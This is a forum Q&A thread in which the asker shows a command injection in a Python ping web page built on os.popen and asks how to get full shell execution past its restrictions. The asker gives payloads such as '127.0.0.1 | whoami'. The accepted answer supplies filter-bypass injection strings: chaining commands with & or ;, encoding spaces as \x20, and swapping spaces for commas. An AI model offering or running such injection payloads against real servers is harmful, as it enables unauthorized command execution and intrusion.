Full shell from pingit application

Question

when I entered 127.0.0.1 the result was:-

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

when I entered 127.0.0.1%00 I got the following result:-

Traceback (most recent call last): File "C:\Inetpub\wwwroot\pingit.py", line 9, in output=os.popen("ping " + form["action"].value).readlines() TypeError: popen() argument 1 must be string without null bytes, not str

I can execute single word commands like dir, whoami, etc like:-

127.0.0.1 | dir 
and
127.0.0.1 | whoami 
but cannot execute the following commands
127.0.0.1 | net user

How can I get full shell command execution with such restrictions

Why did you use `127.0.0.1%00`? What effect were you hoping to have? — schroeder, Aug 21 '17 at 10:37
@schroeder the null byte resulted into an error as popen cannot handle null bytes hence i added the same — Aayush, Aug 22 '17 at 06:20
@schroeder the title of this question was misleading now if you think it is correct please remove the hold — Aayush, Aug 22 '17 at 06:43

t.m.adam · Accepted Answer · 2018-05-08T12:57:41.333

Use the & operator to combine two or more commands on windows (for unix use the ; operator).

If you need your command to be a string with no empty spaces, you could replace all space characters with their hex value (\x20), so the dir command would be:

127.0.0.1\x20&\x20dir

Note that this method works only with the Python interperter.

An alternative that works well with Python's os.popen and on windows termilal would be to use a comma between your parameters and remove all spaces between the commands, eg:

127.0.0.1&dir,c:\users

Full shell from pingit application

1 Answers1